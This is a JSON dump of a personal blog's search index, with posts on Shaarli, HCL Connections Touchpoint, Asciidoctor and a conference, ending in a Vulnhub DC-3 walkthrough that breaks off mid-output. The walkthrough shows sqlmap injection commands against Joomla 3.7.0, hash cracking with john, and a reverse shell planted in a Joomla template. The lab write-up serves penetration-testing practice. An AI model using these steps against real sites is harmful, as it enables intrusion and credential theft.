review and post it.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_40_2020/","title":"Linkdump Week 40 / 2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/bookmarks/","title":"Bookmarks"},{"body":"I use Shaarli since ages to collect links, notes and bookmarks. I worked a little bit on that collection and started to share some as public lists .\nOn my mobile device I bought a license for Stakali , it fits perfectly into my workflows. I often search on my mobile and share the link through Stakali to my desktop. Stakali just needs the URL and the API Key of Shaarli, but I got errors. So I analyzed the source and app with:\nGenymotion Burp Suite Community Edition Stakali has an option to disable SSL Key checking, so no need to use any more tools to intercept the traffic. On Android you normally have to disable SSL Pinning. Here is a good start to learn how to do this .\nEven with enabled API it didn’t work. First I used the default .htaccess, but got Error 500 accessing the api.\n.htaccess\n# Disable directory listing Options -Indexes RewriteEngine On # Prevent accessing subdirectories not managed by SCM RewriteRule ^(.git|doxygen|vendor) - [F] RewriteCond %{HTTP:Authorization} ^(.+) RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] # REST API RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^ index.php [L] ... Add this line With RewriteBase the Error 500 accessing the API disappeared, but logon with mobile still wasn’t possible.\nI enabled the debug mode and wrote a little php script to check the headers and environment variables:\nshaarli/data/config.json.php\n... }, \u0026#34;dev\u0026#34;: { \u0026#34;debug\u0026#34;: true } } Add a new element to the json to enable debugging My hoster uses FastCGI with PHP and this strips the Authorization header, but the RewriteRule RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] should add an environment variable HTTP_AUTHORIZATION with the content of the Authorization header.\nThis does not work for me, but I found a workaround:\n.htaccess\n... SetEnvIf Authorization .+ HTTP_AUTHORIZATION=$0 # RewriteCond %{HTTP:Authorization} ^(.+) # RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] ... add this line\ncomment out\ncomment out\nI replaced the RewriteRule with this SetEnvIf directive. Now I found the used Bearer JWT Token when I debugged the access, but Shaarli didn’t accept the token, because the variable was renamed to REDIRECT_HTTP_AUTHORIZATION and Shaarli is not aware of this.\nI couldn’t find an easy way to get this working, so I changed the code directly and created a Pull Request . I added the comments to .htaccess to make it easier (just comment out or in the rewrite rules) and application/api/ApiMiddleware.php.\nYou can see all changes here . Not sure if this all is needed or good, but it works for me. I just added the new environment variable and the application doesn’t run into exceptions any more.\n","excerpt":"\u003cp\u003eI use \u003ca href=\"https://github.com/shaarli/shaarli\" target=\"_blank\"\u003eShaarli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n since ages to collect links, notes and bookmarks. I worked a little bit on that collection and started to \u003ca href=\"https://shaarli.stoeps.de\" target=\"_blank\"\u003eshare some as public lists \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eOn my mobile device I bought a license for \u003ca href=\"https://stakali.toneiv.eu/\" target=\"_blank\"\u003eStakali \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, it fits perfectly into my workflows. I often search on my mobile and share the link through Stakali to my desktop. Stakali just needs the URL and the API Key of Shaarli, but I got errors. So I analyzed the source and app with:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/shaarli/","title":"Selfhost Shaarli"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/selfhosting/","title":"Selfhosting"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/shaarli/","title":"Shaarli"},{"body":"HCL included some additional apps with HCL Connections 6.5CR1. One of them is Touchpoint, which can be used to present users the \u0026ldquo;Terms and Conditions\u0026rdquo; (or Privacy and Guidelines) of the environment and some help creating their profile, network and become member of their first communities.\nTouchpoint writes some profile extension entries in the PEOPLEDB database in the table PROFILE_EXTENSIONS, most important:\ntouchpointState: stores the information if a user has completed Touchpoint and the timestamp of completion\nprivacyAndGuidelines: Version number of accepted Privacy Guidelines\nExample \"PROF_KEY\" \"PROF_PROPERTY_ID\" \"PROF_VALUE\" \"94caae68-8eb7-42fd-ac76-e04d4c0ab6bf\"\ntouchpointState\n\"{\"\"state\"\":\"\"complete\"\",\"\"timestamp\"\":1599817448000}\"\n\"94caae68-8eb7-42fd-ac76-e04d4c0ab6bf\"\nprivacyAndGuidelines\n\"2.1\"\nTo activate touchpoint itself, you have to edit touchpoint-config.xml in the LotusConnections-config folder of your Websphere deployment.\nActivate and Configure Touchpoint \u0026lt;config id=\u0026#34;touchpoint\u0026#34; xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34; xsi:noNamespaceSchemaLocation=\u0026#34;touchpoint-config.xsd\u0026#34;\u0026gt; \u0026lt;uiEnabled\u0026gt;true\u0026lt;/uiEnabled\u0026gt; \u0026lt;steps\u0026gt; \u0026lt;paths\u0026gt; \u0026lt;defaultPath\u0026gt;welcome,editProfile,profileTags,findColleagues,followCommunities\u0026lt;/defaultPath\u0026gt; \u0026lt;icExternalPath\u0026gt;welcome,editProfile,profileTags\u0026lt;/icExternalPath\u0026gt; \u0026lt;pagStandalone\u0026gt;pagStandalone\u0026lt;/pagStandalone\u0026gt; \u0026lt;/paths\u0026gt; \u0026lt;order\u0026gt;welcome,editProfile,profileTags,findColleagues,followCommunities\u0026lt;/order\u0026gt; \u0026lt;welcome\u0026gt; \u0026lt;templateFile\u0026gt;templates/welcome.html\u0026lt;/templateFile\u0026gt; \u0026lt;/welcome\u0026gt; \u0026lt;/steps\u0026gt; \u0026lt;privacyAndGuidelines\u0026gt; \u0026lt;enabled\u0026gt;true\u0026lt;/enabled\u0026gt; \u0026lt;version\u0026gt;2.1\u0026lt;/version\u0026gt; \u0026lt;externalLink\u0026gt;https://stoeps.de\u0026lt;/externalLink\u0026gt; \u0026lt;internalLink\u0026gt;https://stoeps.de\u0026lt;/internalLink\u0026gt; \u0026lt;/privacyAndGuidelines\u0026gt; \u0026lt;maxPromotedExperts\u0026gt;3\u0026lt;/maxPromotedExperts\u0026gt; \u0026lt;promotedExperts/\u0026gt; \u0026lt;maxPromotedCommunities\u0026gt;3\u0026lt;/maxPromotedCommunities\u0026gt; \u0026lt;promotedCommunities/\u0026gt; \u0026lt;welcomeVideoUrl/\u0026gt; \u0026lt;contentDirectory\u0026gt;/opt/nfs/touchpoint/\u0026lt;/contentDirectory\u0026gt; \u0026lt;orientMe\u0026gt; \u0026lt;enabled\u0026gt;false\u0026lt;/enabled\u0026gt; \u0026lt;socialCtxRoot\u0026gt;/social\u0026lt;/socialCtxRoot\u0026gt; \u0026lt;itmCtxRoot\u0026gt;/itm\u0026lt;/itmCtxRoot\u0026gt; \u0026lt;/orientMe\u0026gt; \u0026lt;/config\u0026gt; Set to true to enable Touchpoint\nSet to true to enable Privacy and Guidelines\nVersion number, increase to display the guidelines again\nWhen you increase the PAG version and restart Touchpoint, the users get the PAG screen when they refresh or open a Connections page, or on the next login.\nTouchpoint and Privacy and Guidelines (PAG) can be activated independently. So just Touchpoint, PAG standalone or both.\nWithin paths you can configure the shown pages for internal users, external users and PAG.\nAll configuration options in the official documentation: https://help.hcltechsw.com/connections/v65/admin/install/tp_r_touchpoint_config_properties.html TDI caveats The default TDI Assemblyline (tdisol-path/TDI/conf/LotusConnections-config/tdi-profiles-config.xml) has following entries since the touchpoint integration:\n\u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; What does this mean? Everytime when you run sync_all_dns.sh|bat and a user profile is changed, the database extension entries (privacyAndGuidlines,touchpointState and touchpointSession) of all changed users will be overwritten and Touchpoint/PAG will be presented to these users over and over again, WHEN the LDAP doesn’t contain this attributes (and I bet it doesn’t).\nAs long as you just want to use PAG or Touchpoint, comment out these three lines to prevent getting Touchpoint over and over again.\nJust comment out (all five lines of touchpoint extensions)\n\u0026lt;!-- \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;recommendedTags\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;departmentKey\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; --\u0026gt; So these values are handled by Touchpoint and no longer set or overwritten by TDI.\nUpdate I forgot to mention, when you disable the fields in tdi-profiles-config.xml, you have to comment out the same fields in conf/LotusConnections-config/profiles-types.xml:\n\u0026lt;!-- \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;recommendedTags\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;departmentKey\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;read\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;true\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;privacyAndGuidelines\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;touchpointState\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;touchpointSession\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; --\u0026gt; Thanks to Vincent Gicquel , for remembering me.\nUpdate 2 Another possible workaround to prevent TDI from deleting the touchpoint state is described in this article. ","excerpt":"\u003cp\u003eHCL included some additional apps with HCL Connections 6.5CR1. One of them is Touchpoint, which can be used to present users the \u0026ldquo;Terms and Conditions\u0026rdquo; (or Privacy and Guidelines) of the environment and some help creating their profile, network and become member of their first communities.\u003c/p\u003e\n\u003cp\u003eTouchpoint writes some profile extension entries in the \u003ccode\u003ePEOPLEDB\u003c/code\u003e database in the table \u003ccode\u003ePROFILE_EXTENSIONS\u003c/code\u003e, most important:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/touchpointinhclcnx/","title":"Touchpoint in HCL Connections 6.5CR1"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/antora/","title":"Antora"},{"body":"Time is running very fast and I completely forgot to update the blog for a long time.\nWhat happened since DNUG Day 2020 ?\nChanging the job Some have already seen on LinkedIn that I joined Vegard IT . I’m very excited and see forward working and meeting with the new colleagues. During the Covid lockdown on boarding is a tough process, but I think we’re doing very well. So I’m still around and work with Connections, Kubernetes and other fun stuff.\nEngage 2020 I attended Engage 2020 and enjoyed it very much meeting old and new friends. The session with Martin Schmidt was a big fun, we talked about \u0026ldquo;Kubernetes - Build or Buy\u0026rdquo;, slides can be downloaded .\nThanks Theo , Hilde and the team of Engage for building this event.\nKubernetes Since months I do more and more Kubernetes deployments. So I built local clusters with Vagrant , Terraform , Rancher and kubeadm .\nMy goals are getting the CKA certification the next weeks and a smooth (automated) deployment for HCL Connections Componentpack.\nSo I work on topics like troubleshooting, breaking \u0026amp; reparing clusters and think about backup \u0026amp; restore of applications.\nHCL Connections 6.5CR1 The first installs (test, demo, production) are running very good. The new componentpack supports newer Kubernetes versions now.\nTechnical writing - documentation as code The last days I moved some of my Asciidoctor files to Antora . Antora can create documentation from multiple git repositories. So I can keep the documentation in the projects (e.g. Connections deployment repositorieis) and create a large set of documentation for my local computer or our intranet. Other definitions can create the single project documentation (just one repository).\nI like Antora because it can work with Asciidoctor files, but it is way more. It splits content from ui, is fast and helps me even handle my daily notes.\nAntora can handle git tags and branches, so new versions can be documented in new branches and the documentation provides all documents from all created versions. See the Antora docs , or one of the other projects which uses Antora. For example:\nFedora Linux Couchbase Docs Great article to start with Antora and a complete intro on Antora and Asciidoctor .\n","excerpt":"\u003cp\u003eTime is running very fast and I completely forgot to update the blog for a long time.\u003c/p\u003e\n\u003cp\u003eWhat happened since \u003ca href=\"/2020/01/15/dnug-connections-day-2020/\"\u003eDNUG Day 2020\u003c/a\u003e\n?\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/some-updates/","title":"Some updates (some delayed) on Engage 2020, Connections, my job and documentation as code"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/asciidoc/","title":"Asciidoc"},{"body":"I write most of my documentation with Asciidoctor , so saving some keystrokes is important.\nYou can add window=_blank to links in your Asciidoctor source.\nFor example:\n* https://www.duckduckgo.com[window=_blank] * https://www.duckduckgo.com[DuckDuckGo, window=_blank] https://www.duckduckgo.com DuckDuckGo So this creates links with the html source:\n\u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; class=\u0026#34;bare\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;https://www.duckduckgo.com\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;DuckDuckGo\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; The good thing is, that there is a shortcut for this. You can replace window=_blank with a ^:\n* https://www.duckduckgo.com[^] * https://www.duckduckgo.com[DuckDuckGo^] https://www.duckduckgo.com DuckDuckGo Following html source is generated\n\u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; class=\u0026#34;bare\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;https://www.duckduckgo.com\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;DuckDuckGo\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; You see the result is absolutly the same.\nThis work also with Antora and was implemented with Asciidoctor 1.5.7 .\nThanks to Dan Allen to mention this in the Antora Gitter Chat .\n","excerpt":"\u003cp\u003eI write most of my documentation with \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, so saving some keystrokes is important.\u003c/p\u003e\n\u003cp\u003eYou can add \u003ccode\u003ewindow=_blank\u003c/code\u003e to links in your Asciidoctor source.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/asciidoctor-links/","title":"Asciidoctor open links in new window"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/dnug/","title":"DNUG"},{"body":"This week I attended the DNUG Connections Day 2020 in Munich . First of all I need to thank the organization team which did a really good job (Thanks Andreas , Martti and Lara ). During the short breaks we had great conversations with parts of the HCL Developer team and other attendees.\nUpdate\nI completely forgot to mention Jörg Rafflenbeul ! He was responsible for beer steins, a great glass of quits jar, photos, videos and a ton more. Sorry Joerg and thank you!\nDuring the first session (Connections Roadmap with Danielle Baptiste ) there was a very important announcement and parts of the audience were really surprised. But let’s start with an extended roadmap for 2020 and the final \u0026ldquo;big bang\u0026rdquo; on Version 7.\nDisclaimer: some of the stuff is marked with \u0026ldquo;Subject to change\u0026rdquo;!\nHCL Connections Roadmap 2020 6.5 CR1 — Q1/2020 Mailintegration in CNX Ui\nHCL Wash\nDocs\nCEC\nPlugins\nSo we get the mailintegration back into the Connections UI and more apps will get the new logos.\n6.5 CR2 — Q2/2020 Integration Strategy\nMS Teams\nNew Outlook Integration\nMS Identity platform\nOrient Me enhancements + Print PDF\nDocs CR4\nThat sounds really interesting, integrating Microsoft software into Connections is a huge step in my eyes.\n6.5 CR3 — Q3/2020 Interactive OM calendar\nLeap integration\nSharepoint integration\nOneDrive integration\nSo more integration points for 3rd party.\nV7 — Q4/2020 O365 Integration\nIntuite UX\nRobust mail, calendar and chat integration\nContainerization\nKubernetes annoucement So and now to the big annoucement. V7 will completely run on Kubernetes! There will be application which still need WebSphere, but these will run already in containers on the Kubernetes stack.\nThere are several workshops and article planned to help everybody on the transition from WebSphere to Kubernetes.\nMore sessions Over the day Sandra Bühler presented about the MSP cloud offering of Belsoft, ISW and Prominic. Maria Nordin showed the new Activities+ and Stefan Hessler the new parts Social Sidebar, Touchpoint and Invite of HCL Connections. Andre Hagemeier got several pages of his notebook filled with requests, ideas and wishes of the audience.\nSome interesting tweets during the day:\nhttps://twitter.com/easterlakes/status/1216614868461203462 https://twitter.com/social_baptiste/status/1216690195975852032 https://twitter.com/social_baptiste/status/1216658904693772291 My session on Containers and Kubernetes I’m really happy that HCL will do this move and my session did an introduction on containers, infrastructure as code and automation. We get a real good opportunity to start over with Kubernetes and implement the basics of these technologies from the beginning.\nYou can start learning today and build a Kubernetes cluster for Connections componentpack, so don’t wait until version 7!\nYou find the slide deck here:\nDocker and Kubernetes Basics ","excerpt":"\u003cp\u003eThis week I attended the \u003ca href=\"https://dnug.de/connections-day-2020/\" target=\"_blank\"\u003eDNUG Connections Day 2020 in Munich \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. First of all I need to thank the organization team which did a really good job (Thanks \u003ca href=\"https://twitter.com/easterlakes\" target=\"_blank\"\u003eAndreas \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"https://twitter.com/mgarden\" target=\"_blank\"\u003eMartti \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://twitter.com/Lara39591380\" target=\"_blank\"\u003eLara \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n). During the short breaks we had great conversations with parts of the \u003ca href=\"https://www.hcltechsw.com/wps/portal/hclsw-home\" target=\"_blank\"\u003eHCL \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Developer team and other attendees.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eI completely forgot to mention \u003ca href=\"https://twitter.com/jrafflen\" target=\"_blank\"\u003eJörg Rafflenbeul \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n! He was responsible for beer steins, a great glass of quits jar, photos, videos and a ton more. Sorry Joerg and thank you!\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/dnug-connections-day-2020/","title":"DNUG Connections Day 2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sqlmap/","title":"Sqlmap"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnhub/","title":"Vulnhub"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/walkthrough/","title":"Walkthrough"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/walkthrough/","title":"Walkthrough"},{"body":" Link to Vulnhub DC Challenges Original Description\nDC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.\nAs with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.\nLinux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.\nFor beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.\nFor those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).\nIf that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.\nRecon nmap\nroot@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST Nmap scan report for DC3VM.stoeps.lab (10.128.1.156) Host is up (0.00095s latency). MAC Address: 00:0C:29:7F:2F:B8 (VMware) root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST Nmap scan report for DC3VM.stoeps.lab (10.128.1.156) Host is up (0.0011s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Home MAC Address: 00:0C:29:7F:2F:B8 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 1.12 ms DC3VM.stoeps.lab (10.128.1.156) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds A short check with the browser shows us a Joomla webpage. Let’s check version and possible attacks.\njoomscan\nroot@kali:~/vulnhub/dc3# apt install joomscan root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156 ____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \\/ )/ __) / __) /__\\ ( \\( ) .-_)( )(_)( )(_)( ) ( \\__ \\( (__ /(__)\\ ) ( \\____) (_____)(_____)(_/\\/\\_)(___/ \\___)(__)(__)(_)\\_) (1337.today) --=[OWASP JoomScan +---++---==[Version : 0.0.7 +---++---==[Update Date : [2018/09/23] +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo --=[Code name : Self Challenge @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP Processing http://10.128.1.156 ... [+] FireWall Detector [++] Firewall not detected [+] Detecting Joomla Version [++] Joomla 3.7.0 [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable [+] Checking Directory Listing [++] directory has directory listing : http://10.128.1.156/administrator/components http://10.128.1.156/administrator/modules http://10.128.1.156/administrator/templates http://10.128.1.156/images/banners [+] Checking apache info/status files [++] Readable info/status files are not found [+] admin finder [++] Admin page : http://10.128.1.156/administrator/ [+] Checking robots.txt existing [++] robots.txt is not found [+] Finding common backup files name [++] Backup files are not found [+] Finding common log files name [++] error log is not found [+] Checking sensitive config.php.x file [++] Readable config files are not found Your Report : reports/10.128.1.156/ Not that detailed like with wpscan, but enough infos for now. We know it’s Joomla 3.7.\nsearchsploit\nroot@kali:~/vulnhub/dc3# searchsploit joomla 3.7 ----------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------- ---------------------------------------- Joomla! 3.7 - SQL Injection | exploits/php/remote/44227.php Joomla! 3.7.0 - \u0026#39;com_fields\u0026#39; SQL Injection | exploits/php/webapps/42033.txt The file 42033.txt tells us, that a call is vulnerable for sqlmap.\n42033.txt\n... sqlmap -u \u0026#34;http://localhost/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ --dbs -p list[fullordering] ... Attack Joomla SQLMAP Get databases\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] --dbs ... available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys ... Get tables\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] -D joomladb --tables ... Database: joomladb [76 tables] +---------------------+ | #__assets | | ... | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels | +---------------------+ ... the user table Dump table\nsqlmap -u \u0026#34;http://10.128.1.156/index.php?option=com_fields\u0026amp;view=fields\u0026amp;layout=modal\u0026amp;list[fullordering]=updatexml\u0026#34; --risk=3 --level=5 --random-agent \\ -p list[fullordering] -D joomladb -T \\#__users --dump ... [14:39:05] [WARNING] unable to retrieve column names for table \u0026#39;#__users\u0026#39; in database \u0026#39;joomladb\u0026#39; [14:39:05] [INFO] fetching entries for table \u0026#39;#__users\u0026#39; in database \u0026#39;joomladb\u0026#39; [14:39:05] [INFO] used SQL query returns 1 entry [14:39:05] [INFO] resumed: \u0026#39;0\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;0\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;freddy@norealaddress.net\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;629\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;2019-04-01 20:27:08\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;admin\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;{\u0026#34;admin_style\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;admin_language\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;language\u0026#34;:\u0026#34;\u0026#34;,\u0026#34;editor\u0026#34;:\u0026#34;\u0026#34;... [14:39:05] [INFO] resumed: \u0026#39;$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;2019-03-23 09:44:38\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;1\u0026#39; [14:39:05] [INFO] resumed: \u0026#39;admin\u0026#39; Database: joomladb Table: #__users [1 entry] Username\nHash\nI put user and hash into a textfile user.\nuser\nadmin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu And run john the ripper on the file.\nroot@kali:~/vulnhub/dc3# john user Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single ... Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist snoopy (admin) 1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed root@kali:~/vulnhub/dc3# john --show user admin:snoopy 1 password hash cracked, 0 left got the password\nJoomla login credentials\nRemote Shell Login to Joomla and go to Extension \u0026gt; Templates. Replace the index.php of the actual template with the code from /usr/share/webshells/php/php-reverse-shell.php. Just change the ip for netcat.\nNow run nc -nlvp 1234 on Kali and open the Joomla page again.\npython3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@DC3VM:/tmp$ uname -a Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux www-data@DC3VM:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial Exploit and root flag I searched for sudoer, sticky bit binaries and other stuff to get root. Finally I decided to use a kernel exploit.\nsearchsploit\nroot@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04 ----------------------------------------------------------------------------------------------------------------------- -------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------- -------------------------------------- Apport 2.x (Ubuntu Desktop 12.10 